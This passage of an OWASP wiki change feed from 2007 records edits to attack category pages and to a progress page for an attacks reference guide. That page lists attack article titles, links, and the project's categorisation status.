		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Fixation.jpg&amp;diff=23142</id>
		<title>File:Fixation.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Fixation.jpg&amp;diff=23142"/>
				<updated>2007-11-06T11:55:41Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:Spoofing&amp;diff=23128</id>
		<title>Category:Spoofing</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:Spoofing&amp;diff=23128"/>
				<updated>2007-11-05T20:36:48Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: New page: category:attack&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[category:attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:Protocol_Manipulation&amp;diff=23127</id>
		<title>Category:Protocol Manipulation</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:Protocol_Manipulation&amp;diff=23127"/>
				<updated>2007-11-05T20:36:15Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: New page: category:attack&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[category:attack]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:Attack&amp;diff=23126</id>
		<title>Category:Attack</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:Attack&amp;diff=23126"/>
				<updated>2007-11-05T20:04:40Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: /* Work to be done here includes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This category is for tagging common types of application security attacks. &lt;br /&gt;
&lt;br /&gt;
==What is an attack?==&lt;br /&gt;
&lt;br /&gt;
Attacks are the techniques that attackers use to exploit the vulnerabilities in applications. Attacks are often confused with vulnerabilities, so please try to be sure that the attack you are describing is something that an attacker would do, rather than a weakness in an application.&lt;br /&gt;
&lt;br /&gt;
{{Template:PutInCategory}}&lt;br /&gt;
&lt;br /&gt;
An attack article should include:&lt;br /&gt;
* a description of exactly how the attack works&lt;br /&gt;
* tools and techniques for performing the attack&lt;br /&gt;
* links to related threats, vulnerabilities, and countermeasures&lt;br /&gt;
&lt;br /&gt;
==Work to be done here includes==&lt;br /&gt;
&lt;br /&gt;
We're in the process of creating, organizing, and completing the attack articles. If you'd like to help, find some stub articles in this category and fill in the details.&lt;br /&gt;
&lt;br /&gt;
Creating articles for the following topics:&lt;br /&gt;
*Unauthorized Access Attempts&lt;br /&gt;
*File location guessing (see [[Guessed or visible temporary file]])&lt;br /&gt;
*URL Redirection&lt;br /&gt;
* ... make sure the attack is listed for each [[:Category:Vulnerability|vulnerability]]&lt;br /&gt;
&lt;br /&gt;
Note: many of the items marked vulnerabilities from CLASP and other places are really attacks. Some of the more obvious are:&lt;br /&gt;
* [[Log injection]]&lt;br /&gt;
* [[Resource exhaustion]]&lt;br /&gt;
* [[Reflection injection]]&lt;br /&gt;
* [[Reflection attack in an auth protocol]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Article Type]]&lt;br /&gt;
[[Category:OWASP Honeycomb Project]]&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=SpoC_007_-_Attacks_Reference_Guide_-_Progress_Page&amp;diff=23125</id>
		<title>SpoC 007 - Attacks Reference Guide - Progress Page</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=SpoC_007_-_Attacks_Reference_Guide_-_Progress_Page&amp;diff=23125"/>
				<updated>2007-11-05T20:02:33Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: /* Phase 1 - 100% DONE */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.owasp.org/index.php/SpoC_007_-_Attacks_Reference_Guide Back to Attacks Reference Guide Main Page] &lt;br /&gt;
&lt;br /&gt;
[http://www.owasp.org/index.php/SpoC_007_-_Refresh_Attacks_list Back to Refresh Attacks List Main Page]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The Attack reference guide is being developed by [[SpoC_007_-_Attacks_Reference_Guide |NSRAV Security R&amp;amp;D]] and [[SpoC_007_-_Refresh_Attacks_list |Przemyslaw 'Rezos' Skowron]]. In order to avoid work superposition, the project was divided in 3 phases comprising the following activities:&lt;br /&gt;
&lt;br /&gt;
# Attack list revision and description (60% of the project)&lt;br /&gt;
# Attacks categorization (20% of the project)&lt;br /&gt;
# Research and describe new attacks (20% of the project)&lt;br /&gt;
&lt;br /&gt;
Total project status: '''100% Done!'''&lt;br /&gt;
&lt;br /&gt;
== CheckPoints and Decision ==&lt;br /&gt;
&lt;br /&gt;
===Phase 1 - 100% DONE ===&lt;br /&gt;
* Attack List Revision: '''Done!'''&lt;br /&gt;
Total number of items on the Attack Guide: '''89'''!&lt;br /&gt;
&lt;br /&gt;
We noticed that Attack reference guide was previously defined based on [http://cwe.mitre.org/ CWE - Common Weakness Enumeration], which defines global software weakness and threats. In order to develop the Attack reference guide focused on Web application attacks, we reviewed the list and marked some items to be removed from the list. The contents of generic or redundant items were used in descriptions of some items and marked to be removed too.&lt;br /&gt;
&lt;br /&gt;
Items considered to removal from the attack list: '''30 items''', as follows:&lt;br /&gt;
&lt;br /&gt;
**[[API_Abuse]]&lt;br /&gt;
**[[Cross_Site_Scripting]]&lt;br /&gt;
**[[Cross-Site_Scripting]]&lt;br /&gt;
**[[CSRF]]&lt;br /&gt;
**[[Internal_software_developer]]&lt;br /&gt;
**[[Interpreter_Injection]]&lt;br /&gt;
**[[Link_Following]]&lt;br /&gt;
**[[Log_forging]]&lt;br /&gt;
**[[Logic/time_bomb]]&lt;br /&gt;
**[[Macro_symbol]]&lt;br /&gt;
**[[Network_amplification]]&lt;br /&gt;
**[[One-Click_Attack]]&lt;br /&gt;
**[[OS_Injection]]&lt;br /&gt;
**[[OS_Command_Injection]]&lt;br /&gt;
**[[PRNG_permanent_compromise_attack]]&lt;br /&gt;
**[[Reviewing_Code_for_OS_Injection]]&lt;br /&gt;
**[[Script_in_IMG_tags]]&lt;br /&gt;
**[[Sniffing_application_traffic_attack]]&lt;br /&gt;
**[[Template:Attack]]&lt;br /&gt;
**[[Unquoted_Search_Path_or_Element]]&lt;br /&gt;
**[[Web_problems]]&lt;br /&gt;
**[[Wildcard_or_Matching_Element]]&lt;br /&gt;
**[[Windows_::DATA_alternate_data_stream]]&lt;br /&gt;
**[[Windows_hard_link]]&lt;br /&gt;
**[[Windows_MS-DOS_device_names]]&lt;br /&gt;
**[[Windows_Path_Link_problems]]&lt;br /&gt;
**[[Windows_Shortcut_Following_%28.LNK%29]]&lt;br /&gt;
**[[Windows_Virtual_File_problems]]&lt;br /&gt;
**[[XSS_Attacks]]&lt;br /&gt;
**[[XSRF]]&lt;br /&gt;
&lt;br /&gt;
* Attacks Description: '''59 of 59 items done'''!&lt;br /&gt;
&lt;br /&gt;
===Phase 2 - DONE! ===&lt;br /&gt;
The attacks categorization was based on [http://capec.mitre.org Common Attack Pattern Enumeration and Classification - CAPEC], since it is maintained by a respected entity and wide enough to fit all web application attacks. &lt;br /&gt;
&lt;br /&gt;
The categories defined are:&lt;br /&gt;
* [[:Category:Abuse of Functionality]]&lt;br /&gt;
* [[:Category:Spoofing]]&lt;br /&gt;
* [[:Category:Probabilistic Techniques]]&lt;br /&gt;
* [[:Category:Exploitation of Authentication]]&lt;br /&gt;
* [[:Category:Resource Depletion]]&lt;br /&gt;
* Exploitation of Privilege/Trust&lt;br /&gt;
* [[:Category:Injection]] (Injecting Control Plane content through the Data Plane)&lt;br /&gt;
* [[:Category:Data_Structure_Attacks]]&lt;br /&gt;
* Data Leakage Attacks&lt;br /&gt;
* [[:Category:Resource Manipulation]]&lt;br /&gt;
* [[:Category:Protocol Manipulation]]&lt;br /&gt;
* Time and State Attacks&lt;br /&gt;
&lt;br /&gt;
It was also defined the threats categorization based on [http://wasc.ptsecurity.ru/wasc/index.php?title=TCv2 WASC Threat Classification v2], under development.&lt;br /&gt;
&lt;br /&gt;
===Phase 3 - 100% DONE ===&lt;br /&gt;
Research and Description of new attacks:&lt;br /&gt;
&lt;br /&gt;
** Block Access to Libraries - add as a example of [[Setting_Manipulation]]&lt;br /&gt;
** [[Buffer_Overflow_via_Environment_Variables]]&lt;br /&gt;
** [[Cross_Frame_Scripting]]&lt;br /&gt;
** [[Denial_of_Service]] - The DoS items previously described were extracted from [[Testing_for_Denial_of_Service]] section of [[OWASP_Testing_Guide]].&lt;br /&gt;
** [[Embedding_Null_Code]]&lt;br /&gt;
** [[Man-in-the-browser_attack]]&lt;br /&gt;
** [[Manipulating_User_Permission_Identifier]]&lt;br /&gt;
** [[Overflow_Binary_Resource_File]]&lt;br /&gt;
** [[Session_Prediction]]&lt;br /&gt;
&lt;br /&gt;
=== Work Done ===&lt;br /&gt;
Note: this links were inserted here by Dinis Cruz from OWASP-NSRAV.zip file&lt;br /&gt;
&lt;br /&gt;
Note2: Other items inserted and sorted by name by Leonardo Cavallari (NSRAV).&lt;br /&gt;
&lt;br /&gt;
* [[Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29]] - ([http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&amp;amp;diff=23056&amp;amp;oldid=6053 diff] , [http://www.owasp.org/index.php?title=Direct_Dynamic_Code_Evaluation_%28%27Eval_Injection%27%29&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Direct_Static_Code_Injection]] - ([http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&amp;amp;diff=23057&amp;amp;oldid=5711 diff] , [http://www.owasp.org/index.php?title=Direct_Static_Code_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Double_Encoding]] - ([http://www.owasp.org/index.php?title=Double_Encoding&amp;amp;diff=23058&amp;amp;oldid=5740 diff] , [http://www.owasp.org/index.php?title=Double_Encoding&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Forced_browsing]] - ([http://www.owasp.org/index.php?title=Forced_browsing&amp;amp;diff=23060&amp;amp;oldid=19889 diff] , [http://www.owasp.org/index.php?title=Forced_browsing&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Format_string_attack]] - ([http://www.owasp.org/index.php?title=Format_string_attack&amp;amp;diff=23065&amp;amp;oldid=7393 diff] , [http://www.owasp.org/index.php?title=Format_string_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[HTTP_Response_Splitting]] - ([http://www.owasp.org/index.php?title=HTTP_Response_Splitting&amp;amp;diff=23117&amp;amp;oldid=7948 diff] , [http://www.owasp.org/index.php?title=HTTP_Response_Splitting&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[HTTP_Request_Smuggling]] - ([http://www.owasp.org/index.php?title=HTTP_Request_Smuggling&amp;amp;diff=23118&amp;amp;oldid=5802 diff], [http://www.owasp.org/index.php?title=HTTP_Request_Smuggling&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[LDAP_injection]] - ([http://www.owasp.org/index.php?title=LDAP_injection&amp;amp;diff=23067&amp;amp;oldid=10830 diff] , [http://www.owasp.org/index.php?title=LDAP_injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Man-in-the-middle_attack]] - ([http://www.owasp.org/index.php?title=Man-in-the-middle_attack&amp;amp;diff=23075&amp;amp;oldid=18290 diff] , [http://www.owasp.org/index.php?title=Man-in-the-middle_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Mobile_code:_invoking_untrusted_mobile_code]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_invoking_untrusted_mobile_code&amp;amp;diff=23077&amp;amp;oldid=6035 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_invoking_untrusted_mobile_code&amp;amp;action=history history history])&lt;br /&gt;
&lt;br /&gt;
* [[Mobile_code:_non-final_public_field]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_non-final_public_field&amp;amp;diff=23079&amp;amp;oldid=6036 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_non-final_public_field&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Mobile_code:_object_hijack]] - ([http://www.owasp.org/index.php?title=Mobile_code%3A_object_hijack&amp;amp;diff=23082&amp;amp;oldid=6040 diff] , [http://www.owasp.org/index.php?title=Mobile_code:_object_hijack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Parameter_Delimiter]] - ([http://www.owasp.org/index.php?title=Parameter_Delimiter&amp;amp;diff=23084&amp;amp;oldid=6190 diff] , [http://www.owasp.org/index.php?title=Parameter_Delimiter&amp;amp;action=history history])&lt;br /&gt;
	&lt;br /&gt;
* [[Path_Manipulation]] - ([http://www.owasp.org/index.php?title=Path_Manipulation&amp;amp;diff=23059&amp;amp;oldid=7983 diff] , [http://www.owasp.org/index.php?title=Path_Manipulation&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Path_Traversal]] - ([http://www.owasp.org/index.php?title=Path_Traversal&amp;amp;diff=23066&amp;amp;oldid=18282 diff] , [http://www.owasp.org/index.php?title=Path_Traversal&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Relative_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Relative_Path_Traversal&amp;amp;diff=23071&amp;amp;oldid=6423 diff] , [http://www.owasp.org/index.php?title=Relative_Path_Traversal&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Repudiation_Attack]] - ([http://www.owasp.org/index.php?title=Repudiation_Attack&amp;amp;diff=23076&amp;amp;oldid=7397 diff] , [http://www.owasp.org/index.php?title=Repudiation_Attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Resource_Injection]] - ([http://www.owasp.org/index.php?title=Resource_Injection&amp;amp;diff=23078&amp;amp;oldid=7980 diff] , [http://www.owasp.org/index.php/Resource_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Server-Side_Includes_%28SSI%29_Injection]] - ([http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&amp;amp;diff=23081&amp;amp;oldid=18278 diff] , [http://www.owasp.org/index.php?title=Server-Side_Includes_%28SSI%29_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Session_hijacking_attack]] - ([http://www.owasp.org/index.php?title=Session_hijacking_attack&amp;amp;diff=23086&amp;amp;oldid=6467 diff] , [http://www.owasp.org/index.php?title=Session_hijacking_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Setting_Manipulation]] - ([http://www.owasp.org/index.php?title=Setting_Manipulation&amp;amp;diff=23088&amp;amp;oldid=7984 diff] , [http://www.owasp.org/index.php?title=Setting_Manipulation&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Special_Element_Injection]] - ([http://www.owasp.org/index.php?title=Special_Element_Injection&amp;amp;diff=23089&amp;amp;oldid=6447 diff] , [http://www.owasp.org/index.php?title=Special_Element_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Spyware]] - ([http://www.owasp.org/index.php?title=Spyware&amp;amp;diff=23090&amp;amp;oldid=6448 diff] , [http://www.owasp.org/index.php?title=Spyware&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[SQL_Injection]] - ([http://www.owasp.org/index.php?title=SQL_Injection&amp;amp;diff=23119&amp;amp;oldid=21964 diff] , [http://www.owasp.org/index.php?title=SQL_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Traffic_flood]] - ([http://www.owasp.org/index.php?title=Traffic_flood&amp;amp;diff=23109&amp;amp;oldid=7392 diff] , [http://www.owasp.org/index.php?title=Traffic_flood&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Trojan_Horse]] - ([http://www.owasp.org/index.php?title=Trojan_Horse&amp;amp;diff=23093&amp;amp;oldid=7078 diff] , [http://www.owasp.org/index.php?title=Trojan_Horse&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Unicode_Encoding]] - ([http://www.owasp.org/index.php?title=Unicode_Encoding&amp;amp;diff=23094&amp;amp;oldid=7943 diff] , [http://www.owasp.org/index.php?title=Unicode_Encoding&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Web_Parameter_Tampering]] - ([http://www.owasp.org/index.php?title=Web_Parameter_Tampering&amp;amp;diff=23104&amp;amp;oldid=6831 diff] , [http://www.owasp.org/index.php?title=Web_Parameter_Tampering&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''New items'''&lt;br /&gt;
** [[Denial_of_Service]]&lt;br /&gt;
** [[Embedding_Null_Code]]&lt;br /&gt;
** [[Man-in-the-browser_attack]]&lt;br /&gt;
** [[Manipulating_User_Permission_Identifier]]&lt;br /&gt;
** [[Session_Prediction]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
by Przemyslaw 'rezos' Skowron (20071025 - part I - first 50%])&lt;br /&gt;
&lt;br /&gt;
* [[Absolute_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Absolute_Path_Traversal&amp;amp;diff=22637&amp;amp;oldid=14001 diff] , [http://www.owasp.org/index.php?title=Absolute_Path_Traversal&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Argument_Injection_or_Modification]] - ([http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&amp;amp;diff=22638&amp;amp;oldid=5186 diff] , [http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Brute_force_attack]] - ([http://www.owasp.org/index.php?title=Brute_force_attack&amp;amp;diff=22641&amp;amp;oldid=13966 diff] , [http://www.owasp.org/index.php?title=Brute_force_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Buffer_overflow_attack]] - ([http://www.owasp.org/index.php?title=Buffer_overflow_attack&amp;amp;diff=22642&amp;amp;oldid=7390 diff] , [http://www.owasp.org/index.php?title=Buffer_overflow_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cache_Poisoning]] - ([http://www.owasp.org/index.php?title=Cache_Poisoning&amp;amp;diff=22647&amp;amp;oldid=13172 diff] , [http://www.owasp.org/index.php?title=Cache_Poisoning&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Code_Injection]] - ([http://www.owasp.org/index.php?title=Code_Injection&amp;amp;diff=22651&amp;amp;oldid=7913 diff] , [http://www.owasp.org/index.php?title=Code_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Command_Injection]] - ([http://www.owasp.org/index.php?title=Command_Injection&amp;amp;diff=22654&amp;amp;oldid=16438 diff] , [http://www.owasp.org/index.php?title=Command_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cross-Site_Request_Forgery]] - ([http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&amp;amp;diff=22643&amp;amp;oldid=19627 diff] , [http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cross-User_Defacement]] - ([http://www.owasp.org/index.php?title=Cross-User_Defacement&amp;amp;diff=22658&amp;amp;oldid=7949 diff] , [http://www.owasp.org/index.php?title=Cross-User_Defacement&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cross-site-scripting]] - ([http://www.owasp.org/index.php?title=Cross-site-scripting&amp;amp;diff=22660&amp;amp;oldid=21443 diff] , [http://www.owasp.org/index.php?title=Cross-site-scripting&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Integer_Overflows/Underflows]] - ([http://www.owasp.org/index.php?title=Integer_Overflows%2FUnderflows&amp;amp;diff=22661&amp;amp;oldid=7380 diff] , [http://www.owasp.org/index.php?title=Integer_Overflows/Underflows&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[XSS_in_error_pages]] - ([http://www.owasp.org/index.php?title=XSS_in_error_pages&amp;amp;diff=22662&amp;amp;oldid=6850 diff] , [http://www.owasp.org/index.php?title=XSS_in_error_pages&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
by Przemyslaw 'rezos' Skowron (20071104 - part II - second 50%])&lt;br /&gt;
&lt;br /&gt;
* [[Account_lockout_attack]] - ([http://www.owasp.org/index.php?title=Account_lockout_attack&amp;amp;diff=22954&amp;amp;oldid=6117 diff] , [http://www.owasp.org/index.php?title=Account_lockout_attack&amp;amp;action=history history])&lt;br /&gt;
* [[Alternate_XSS_Syntax]] - ([http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&amp;amp;diff=22956&amp;amp;oldid=16480 diff], [http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&amp;amp;action=history history])&lt;br /&gt;
* [[Asymmetric_resource_consumption_%28amplification%29]] - ([http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&amp;amp;diff=22957&amp;amp;oldid=5188 diff], [http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&amp;amp;action=history history])&lt;br /&gt;
* [[Blind_SQL_Injection]] - ([http://www.owasp.org/index.php?title=Blind_SQL_Injection&amp;amp;diff=22959&amp;amp;oldid=14497 diff], [http://www.owasp.org/index.php?title=Blind_SQL_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[Blind_XPath_Injection]] - ([http://www.owasp.org/index.php?title=Blind_XPath_Injection&amp;amp;diff=22960&amp;amp;oldid=9579 diff], [http://www.owasp.org/index.php?title=Blind_XPath_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[Comment_Element]] - ([http://www.owasp.org/index.php?title=Comment_Element&amp;amp;diff=22961&amp;amp;oldid=5325 diff], [http://www.owasp.org/index.php?title=Comment_Element&amp;amp;action=history history])&lt;br /&gt;
* [[Cryptanalysis]] - ([http://www.owasp.org/index.php?title=Cryptanalysis&amp;amp;diff=22962&amp;amp;oldid=7389 diff], [http://www.owasp.org/index.php?title=Cryptanalysis&amp;amp;action=history history])&lt;br /&gt;
* [[Custom_Special_Character_Injection]] - ([http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&amp;amp;diff=22963&amp;amp;oldid=5357 diff], [http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[XPATH_Injection]] - ([http://www.owasp.org/index.php?title=XPATH_Injection&amp;amp;diff=22965&amp;amp;oldid=21461 diff], [http://www.owasp.org/index.php?title=XPATH_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[XSS_using_Script_Via_Encoded_URI_Schemes]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&amp;amp;diff=22936&amp;amp;oldid=6851 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&amp;amp;action=history history])&lt;br /&gt;
* [[XSS_using_Script_in_Attributes ]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&amp;amp;diff=22937&amp;amp;oldid=6852 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
NEW ITEMS - 20071104 (by Przemyslaw 'rezos' Skowron):&lt;br /&gt;
* [[Overflow_Binary_Resource_File]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Overflow_Binary_Resource_File&amp;amp;action=history history])&lt;br /&gt;
* [[Cross_Frame_Scripting]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Cross_Frame_Scripting&amp;amp;action=history history])&lt;br /&gt;
* [[Buffer_Overflow_via_Environment_Variables]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Buffer_Overflow_via_Environment_Variables&amp;amp;action=history history])&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=SpoC_007_-_Attacks_Reference_Guide_-_Progress_Page&amp;diff=23124</id>
		<title>SpoC 007 - Attacks Reference Guide - Progress Page</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=SpoC_007_-_Attacks_Reference_Guide_-_Progress_Page&amp;diff=23124"/>
				<updated>2007-11-05T20:00:57Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.owasp.org/index.php/SpoC_007_-_Attacks_Reference_Guide Back to Attacks Reference Guide Main Page] &lt;br /&gt;
&lt;br /&gt;
[http://www.owasp.org/index.php/SpoC_007_-_Refresh_Attacks_list Back to Refresh Attacks List Main Page]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The Attack reference guide is being developed by [[SpoC_007_-_Attacks_Reference_Guide |NSRAV Security R&amp;amp;D]] and [[SpoC_007_-_Refresh_Attacks_list |Przemyslaw 'Rezos' Skowron]]. In order to avoid work superposition, the project was divided in 3 phases comprising the following activities:&lt;br /&gt;
&lt;br /&gt;
# Attack list revision and description (60% of the project)&lt;br /&gt;
# Attacks categorization (20% of the project)&lt;br /&gt;
# Research and describe new attacks (20% of the project)&lt;br /&gt;
&lt;br /&gt;
Total project status: '''100% Done!'''&lt;br /&gt;
&lt;br /&gt;
== CheckPoints and Decision ==&lt;br /&gt;
&lt;br /&gt;
===Phase 1 - 100% DONE ===&lt;br /&gt;
* Attack List Revision: '''Done!'''&lt;br /&gt;
Total number of items on the Attack Guide: '''91'''!&lt;br /&gt;
&lt;br /&gt;
We noticed that Attack reference guide was previously defined based on [http://cwe.mitre.org/ CWE - Common Weakness Enumeration], which defines global software weakness and threats. In order to develop the Attack reference guide focused on Web application attacks, we reviewed the list and marked some items to be removed from the list. The contents of generic or redundant items were used in descriptions of some items and marked to be removed too.&lt;br /&gt;
&lt;br /&gt;
Items considered to removal from the attack list: '''30 items''', as follows:&lt;br /&gt;
&lt;br /&gt;
**[[API_Abuse]]&lt;br /&gt;
**[[Cross_Site_Scripting]]&lt;br /&gt;
**[[Cross-Site_Scripting]]&lt;br /&gt;
**[[CSRF]]&lt;br /&gt;
**[[Internal_software_developer]]&lt;br /&gt;
**[[Interpreter_Injection]]&lt;br /&gt;
**[[Link_Following]]&lt;br /&gt;
**[[Log_forging]]&lt;br /&gt;
**[[Logic/time_bomb]]&lt;br /&gt;
**[[Macro_symbol]]&lt;br /&gt;
**[[Network_amplification]]&lt;br /&gt;
**[[One-Click_Attack]]&lt;br /&gt;
**[[OS_Injection]]&lt;br /&gt;
**[[OS_Command_Injection]]&lt;br /&gt;
**[[PRNG_permanent_compromise_attack]]&lt;br /&gt;
**[[Reviewing_Code_for_OS_Injection]]&lt;br /&gt;
**[[Script_in_IMG_tags]]&lt;br /&gt;
**[[Sniffing_application_traffic_attack]]&lt;br /&gt;
**[[Template:Attack]]&lt;br /&gt;
**[[Unquoted_Search_Path_or_Element]]&lt;br /&gt;
**[[Web_problems]]&lt;br /&gt;
**[[Wildcard_or_Matching_Element]]&lt;br /&gt;
**[[Windows_::DATA_alternate_data_stream]]&lt;br /&gt;
**[[Windows_hard_link]]&lt;br /&gt;
**[[Windows_MS-DOS_device_names]]&lt;br /&gt;
**[[Windows_Path_Link_problems]]&lt;br /&gt;
**[[Windows_Shortcut_Following_%28.LNK%29]]&lt;br /&gt;
**[[Windows_Virtual_File_problems]]&lt;br /&gt;
**[[XSS_Attacks]]&lt;br /&gt;
**[[XSRF]]&lt;br /&gt;
&lt;br /&gt;
* Attacks Description: '''59 of 59 items done'''!&lt;br /&gt;
&lt;br /&gt;
===Phase 2 - DONE! ===&lt;br /&gt;
The attacks categorization was based on [http://capec.mitre.org Common Attack Pattern Enumeration and Classification - CAPEC], since it is maintained by a respected entity and wide enough to fit all web application attacks. &lt;br /&gt;
&lt;br /&gt;
The categories defined are:&lt;br /&gt;
* [[:Category:Abuse of Functionality]]&lt;br /&gt;
* [[:Category:Spoofing]]&lt;br /&gt;
* [[:Category:Probabilistic Techniques]]&lt;br /&gt;
* [[:Category:Exploitation of Authentication]]&lt;br /&gt;
* [[:Category:Resource Depletion]]&lt;br /&gt;
* Exploitation of Privilege/Trust&lt;br /&gt;
* [[:Category:Injection]] (Injecting Control Plane content through the Data Plane)&lt;br /&gt;
* [[:Category:Data_Structure_Attacks]]&lt;br /&gt;
* Data Leakage Attacks&lt;br /&gt;
* [[:Category:Resource Manipulation]]&lt;br /&gt;
* [[:Category:Protocol Manipulation]]&lt;br /&gt;
* Time and State Attacks&lt;br /&gt;
&lt;br /&gt;
It was also defined the threats categorization based on [http://wasc.ptsecurity.ru/wasc/index.php?title=TCv2 WASC Threat Classification v2], under development.&lt;br /&gt;
&lt;br /&gt;
===Phase 3 - 100% DONE ===&lt;br /&gt;
Research and Description of new attacks:&lt;br /&gt;
&lt;br /&gt;
** Block Access to Libraries - add as a example of [[Setting_Manipulation]]&lt;br /&gt;
